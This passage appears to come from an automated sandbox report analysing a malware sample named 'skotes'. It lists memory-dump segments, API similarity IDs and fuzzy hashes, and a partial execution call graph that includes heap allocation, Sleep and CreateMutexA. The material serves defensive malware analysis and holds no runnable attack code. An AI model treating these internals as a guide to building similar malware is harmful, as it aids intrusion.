                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Mtx_unlock$CurrentThread$Cnd_broadcast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 57040152-0
                                                                                                                                                                                                                                          • Opcode ID: 25e1ddbf7358814f205d7bb65d61d0ef3abe49c1018f9abe92e7995d402209c3
                                                                                                                                                                                                                                          • Instruction ID: 583099aebe30a6a4c5a8a0bab37f3a427bedc90798c9e8eaa9ee393735668e98
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 25e1ddbf7358814f205d7bb65d61d0ef3abe49c1018f9abe92e7995d402209c3
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 37A1E3B0A012059FDB10EF64C844B6ABBF8FF15710F0481A9E829D7691EB31EA04DBE1
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _strrchr
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3213747228-0
                                                                                                                                                                                                                                          • Opcode ID: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                          • Instruction ID: aa4686e9587e7ded220a5291786af77e32d18c311b138c076df228285fc14472
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: b6ef493d185ecd6e05961dbd11159ec72a600f70796096a8f2b5786dd78cba64
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 2EB104329086859FDB15CF28C8817BEBFE5EF56350F1481FAE855EB242D6349D01CBA4
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000001.00000002.1780180003.0000000000B71000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B70000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780158000.0000000000B70000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780180003.0000000000BD2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780250583.0000000000BD9000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780269452.0000000000BDB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780291908.0000000000BE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780309951.0000000000BE6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780327725.0000000000BE7000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780436634.0000000000D3A000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780458437.0000000000D3D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780483629.0000000000D53000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780501855.0000000000D54000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D57000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780519621.0000000000D5E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780555757.0000000000D6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780572382.0000000000D6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780594718.0000000000D7B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780611274.0000000000D7C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780634673.0000000000D90000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780652698.0000000000D92000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780671360.0000000000D9A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780689431.0000000000DA7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780707398.0000000000DA8000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780724042.0000000000DA9000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780744239.0000000000DBB000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780762934.0000000000DC2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780780868.0000000000DCA000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780797506.0000000000DCD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780815218.0000000000DD5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780831932.0000000000DD6000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780851670.0000000000DE5000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780871516.0000000000DEC000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780890246.0000000000DF4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780907618.0000000000DF5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780927046.0000000000DFD000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780945183.0000000000E00000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780966630.0000000000E10000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E13000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1780985433.0000000000E3E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781035115.0000000000E55000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781052974.0000000000E56000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781071707.0000000000E6A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781090891.0000000000E6B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781108600.0000000000E6C000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781126834.0000000000E71000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781145089.0000000000E73000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781164139.0000000000E80000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000001.00000002.1781182303.0000000000E81000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_1_2_b70000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Xtime_diff_to_millis2_xtime_get
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 531285432-0
                                                                                                                                                                                                                                          • Opcode ID: 33410e916b34419bdf083195ce92f2ab74d291df0eaee794bb87bf4733661874
                                                                                                                                                                                                                                          • Instruction ID: c1034d018e4d5d807eece966ff2eea3c3e0240c48f0bfd06f3875702650fe5c1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 33410e916b34419bdf083195ce92f2ab74d291df0eaee794bb87bf4733661874
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0821EBB5A00119AFDF00FBA4D885DBEBBB9EF48710F1040A5FA01A7261DB349D05DBA1

                                                                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                                                                          Execution Coverage:1.1%
                                                                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                                                          Signature Coverage:0%
                                                                                                                                                                                                                                          Total number of Nodes:1878
                                                                                                                                                                                                                                          Total number of Limit Nodes:9
                                                                                                                                                                                                                                          execution_graph 9943 b742b0 9946 b73ac0 9943->9946 9945 b742bb shared_ptr 9947 b73af9 9946->9947 9948 ba6c6a RtlAllocateHeap 9947->9948 9953 b73b39 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ 9947->9953 9949 b73be6 9948->9949 9952 b73c38 9949->9952 9967 b732d0 9949->9967 9950 b732d0 6 API calls 9955 b73c5f 9950->9955 9952->9950 9952->9955 9953->9945 9954 b73c68 9954->9945 9955->9954 9984 b73810 9955->9984 9988 b8c6ac 9967->9988 9970 b73314 9971 b7333c __Mtx_unlock 9970->9971 9991 b8c26a 9970->9991 9972 b8c26a 5 API calls 9971->9972 9973 b73350 __floor_pentium4 9971->9973 9974 b73377 9972->9974 9973->9952 9975 b8c6ac GetSystemTimePreciseAsFileTime 9974->9975 9976 b733af 9975->9976 9977 b8c26a 5 API calls 9976->9977 9978 b733b6 9976->9978 9977->9978 9979 b8c26a 5 API calls 9978->9979 9980 b733d7 __Mtx_unlock 9978->9980 9979->9980 9981 b8c26a 5 API calls 9980->9981 9982 b733eb 9980->9982 9983 b7340e 9981->9983 9982->9952 9983->9952 9985 b7381c 9984->9985 10147 b72440 9985->10147 9995 b8c452 9988->9995 9990 b8c6b9 9990->9970 9992 b8c292 9991->9992 9993 b8c274 9991->9993 9992->9992 9993->9992 10012 b8c297 9993->10012 9996 b8c4a8 9995->9996 9998 b8c47a __floor_pentium4 9995->9998 9996->9998 10001 b8cf6b 9996->10001 9998->9990 9999 b8c4fd __Xtime_diff_to_millis2 9999->9998 10000 b8cf6b _xtime_get GetSystemTimePreciseAsFileTime 9999->10000 10000->9999 10002 b8cf87 __aulldvrm 10001->10002 10003 b8cf7a 10001->10003 10002->9999 10003->10002 10005 b8cf44 10003->10005 10008 b8cbea 10005->10008 10009 b8cbfb GetSystemTimePreciseAsFileTime 10008->10009 10010 b8cc07 10008->10010 10009->10010 10010->10002 10017 b72ae0 10012->10017 10014 b8c2ae 10024 b8c1ff 10014->10024 10016 b8c2bf Concurrency::cancel_current_task 10032 b8bedf 10017->10032 10019 b72af4 __dosmaperr 10019->10014 10035 baa671 10019->10035 10025 b8c20b __EH_prolog3_GS 10024->10025 10026 b880c0 RtlAllocateHeap 10025->10026 10027 b8c23d 10026->10027 10086 b726b0 10027->10086 10029 b8c252 10103 b87970 10029->10103 10031 b8c25a 10031->10016 10055 b8cc31 10032->10055 10036 baa67b __dosmaperr 10035->10036 10037 bad82f __dosmaperr RtlAllocateHeap 10036->10037 10047 baa694 10036->10047 10038 baa6bc __dosmaperr 10037->10038 10041 baa6c4 __dosmaperr 10038->10041 10042 baa6fc 10038->10042 10039 ba6ccc 10049 ba8bec 10039->10049 10040 ba8bec __cftof 4 API calls 10045 baa72d 10040->10045 10044 baadf5 __freea RtlAllocateHeap 10041->10044 10043 baa49f __dosmaperr RtlAllocateHeap 10042->10043 10046 baa707 10043->10046 10044->10047 10048 baadf5 __freea RtlAllocateHeap 10046->10048 10047->10039 10047->10040 10048->10047 10050 ba8bf1 __cftof 10049->10050 10053 ba8bfc __cftof 10050->10053 10059 bad634 10050->10059 10080 ba65ed 10053->10080 10056 b8cc3f InitOnceExecuteOnce 10055->10056 10058 b8bef2 10055->10058 10056->10058 10058->10019 10060 bad640 __dosmaperr 10059->10060 10061 baa7c8 __dosmaperr RtlAllocateHeap 10060->10061 10066 bad667 __cftof 10060->10066 10068 bad66d __cftof __dosmaperr 10060->10068 10061->10066 10062 bad6b2 10063 ba75f6 __dosmaperr RtlAllocateHeap 10062->10063 10065 bad6b7 10063->10065 10064 bad69c 10064->10053 10067 ba6c5a ___std_exception_copy RtlAllocateHeap 10065->10067 10066->10062 10066->10064 10066->10068 10067->10064 10069 bad81b __cftof 10068->10069 10070 bad726 10068->10070 10072 bad751 __cftof 10068->10072 10071 ba65ed __cftof 3 API calls 10069->10071 10070->10072 10083 bad62b 10070->10083 10074 bad82e 10071->10074 10072->10064 10075 baa671 __cftof 4 API calls 10072->10075 10078 bad7a5 10072->10078 10075->10078 10077 bad62b __cftof 4 API calls 10077->10072 10078->10064 10079 baa671 __cftof 4 API calls 10078->10079 10079->10064 10081 ba64c7 __cftof 3 API calls 10080->10081 10082 ba65fe 10081->10082 10084 baa671 __cftof 4 API calls 10083->10084 10085 bad630 10084->10085 10085->10077 10108 b87a00 10086->10108 10088 b72702 10089 b72725 10088->10089 10122 b88f40 10088->10122 10091 b88f40 RtlAllocateHeap 10089->10091 10092 b7278e 10089->10092 10091->10092 10093 b727ed shared_ptr 10092->10093 10095 b728b8 10092->10095 10094 ba38af ___std_exception_copy RtlAllocateHeap 10093->10094 10098 b7284b 10094->10098 10097 ba6c6a RtlAllocateHeap 10095->10097 10096 b7287a shared_ptr __floor_pentium4 10096->10029 10097->10098 10098->10096 10099 ba6c6a RtlAllocateHeap 10098->10099 10100 b728c2 10099->10100 10143 ba3912 10100->10143 10102 b728e5 shared_ptr 10102->10029 10104 b8797b 10103->10104 10105 b87996 shared_ptr 10103->10105 10104->10105 10106 ba6c6a RtlAllocateHeap 10104->10106 10105->10031 10107 b879ba 10106->10107 10109 b87a26 10108->10109 10110 b87a2d 10109->10110 10111 b87a81 10109->10111 10112 b87a62 10109->10112 10110->10088 10115 b8d3e2 RtlAllocateHeap 10111->10115 10119 b87a76 __cftof 10111->10119 10113 b87ab9 10112->10113 10114 b87a69 10112->10114 10116 b72480 RtlAllocateHeap 10113->10116 10117 b8d3e2 RtlAllocateHeap 10114->10117 10115->10119 10118 b87a6f 10116->10118 10117->10118 10118->10119 10120 ba6c6a RtlAllocateHeap 10118->10120 10119->10088 10121 b87ac3 __Cnd_destroy_in_situ shared_ptr __Mtx_destroy_in_situ __Cnd_unregister_at_thread_exit 10120->10121 10121->10088 10123 b88f6b 10122->10123 10124 b8908e 10122->10124 10128 b88fdc 10123->10128 10129 b88fb2 10123->10129 10125 b89270 RtlAllocateHeap 10124->10125 10126 b89093 10125->10126 10127 b72480 RtlAllocateHeap 10126->10127 10135 b88fc3 __cftof 10127->10135 10133 b8d3e2 RtlAllocateHeap 10128->10133 10128->10135 10129->10126 10130 b88fbd 10129->10130 10132 b8d3e2 RtlAllocateHeap 10130->10132 10131 ba6c6a RtlAllocateHeap 10134 b8909d 10131->10134 10132->10135 10133->10135 10136 b890b8 10134->10136 10138 b72480 Concurrency::cancel_current_task 10134->10138 10139 b890be 10134->10139 10135->10131 10140 b8904c shared_ptr __cftof 10135->10140 10137 b8d3e2 RtlAllocateHeap 10136->10137 10137->10139 10141 ba38af ___std_exception_copy RtlAllocateHeap 10138->10141 10139->10089 10140->10089 10142 b724c3 10141->10142 10142->10089 10144 ba391f 10143->10144 10145 ba3926 10143->10145 10146 ba8ba3 ___std_exception_destroy RtlAllocateHeap 10144->10146 10145->10102 10146->10145 10150 b8b5d6 10147->10150 10149 b72472 10152 b8b5f1 Concurrency::cancel_current_task 10150->10152 10151 ba8bec __cftof 4 API calls 10153 b8b69f 10151->10153 10152->10151 10154 b8b658 __cftof __floor_pentium4 10152->10154 10154->10149 10155 b79ab8 10157 b79acc 10155->10157 10158 b79b08 10157->10158 10159 b79b4b shared_ptr 10158->10159 10163 b7a917 10158->10163 10160 b79b65 10159->10160 10161 b79b59 10159->10161 10162 b87a00 RtlAllocateHeap 10160->10162 10165 b880c0 RtlAllocateHeap 10161->10165 10164 b79b74 10162->10164 10166 b7a953 Sleep CreateMutexA 10163->10166 10167 ba6c6a RtlAllocateHeap 10163->10167 10184 b75c10 10164->10184 10169 b7a903 10165->10169 10170 b7a98e 10166->10170 10167->10166 10171 b79b7c 10235 b78b30 10171->10235 10173 b79b8d 10272 b88220 10173->10272 10175 b79b9c 10176 b87a00 RtlAllocateHeap 10175->10176 10177 b79ca9 10176->10177 10178 b75c10 4 API calls 10177->10178 10179 b79cb1 10178->10179 10180 b78b30 4 API calls 10179->10180 10181 b79cc2 10180->10181 10182 b88220 RtlAllocateHeap 10181->10182 10183 b79cd1 10182->10183 10280 b75940 10184->10280 10186 b75c54 10283 b74b30 10186->10283 10188 b75d17 shared_ptr __floor_pentium4 10188->10171 10189 b75c7b shared_ptr 10189->10188 10190 ba6c6a RtlAllocateHeap 10189->10190 10191 b75d47 __cftof 10190->10191 10191->10191 10192 b880c0 RtlAllocateHeap 10191->10192 10194 b75e3e 10192->10194 10193 b75ea6 shared_ptr __floor_pentium4 10193->10171 10194->10193 10195 ba6c6a RtlAllocateHeap 10194->10195 10196 b75ed2 10195->10196 10197 b75ffe shared_ptr __floor_pentium4 10196->10197 10198 ba6c6a RtlAllocateHeap 10196->10198 10197->10171 10199 b7601b 10198->10199 10200 b880c0 RtlAllocateHeap 10199->10200 10201 b76089 10200->10201 10202 b880c0 RtlAllocateHeap 10201->10202 10203 b760bd 10202->10203 10204 b880c0 RtlAllocateHeap 10203->10204 10205 b760ee 10204->10205 10206 b880c0 RtlAllocateHeap 10205->10206 10207 b7611f 10206->10207 10208 b880c0 RtlAllocateHeap 10207->10208 10210 b76150 10208->10210 10209 b765b1 shared_ptr __floor_pentium4 10209->10171 10210->10209 10211 ba6c6a RtlAllocateHeap 10210->10211 10212 b765dc 10211->10212 10213 b87a00 RtlAllocateHeap 10212->10213 10214 b766a6 10213->10214 10215 b75c10 4 API calls 10214->10215 10216 b766ac 10215->10216 10217 b75c10 4 API calls 10216->10217 10218 b766b1 10217->10218 10290 b722c0 10218->10290 10220 b766c9 shared_ptr 10221 b87a00 RtlAllocateHeap 10220->10221 10222 b76732 10221->10222 10223 b75c10 4 API calls 10222->10223 10224 b7673d 10223->10224 10225 b722c0 4 API calls 10224->10225 10234 b76757 shared_ptr 10225->10234 10226 b76852 10227 b880c0 RtlAllocateHeap 10226->10227 10229 b7689c 10227->10229 10228 b87a00 RtlAllocateHeap 10228->10234 10230 b880c0 RtlAllocateHeap 10229->10230 10232 b768e3 shared_ptr __floor_pentium4 10230->10232 10231 b75c10 4 API calls 10231->10234 10232->10171 10233 b722c0 4 API calls 10233->10234 10234->10226 10234->10228 10234->10231 10234->10233 10236 b78b7c 10235->10236 10237 b87a00 RtlAllocateHeap 10236->10237 10238 b78b8c 10237->10238 10239 b75c10 4 API calls 10238->10239 10240 b78b97 10239->10240 10241 b880c0 RtlAllocateHeap 10240->10241 10242 b78be3 10241->10242 10243 b880c0 RtlAllocateHeap 10242->10243 10244 b78c35 10243->10244 10245 b88220 RtlAllocateHeap 10244->10245 10248 b78c47 shared_ptr 10245->10248 10246 b78d01 shared_ptr __floor_pentium4 10246->10173 10247 ba6c6a RtlAllocateHeap 10249 b78d2d 10247->10249 10248->10246 10248->10247 10250 b87a00 RtlAllocateHeap 10249->10250 10251 b78d8f 10250->10251 10252 b75c10 4 API calls 10251->10252 10253 b78d9a 10252->10253 10253->10253 10254 b880c0 RtlAllocateHeap 10253->10254 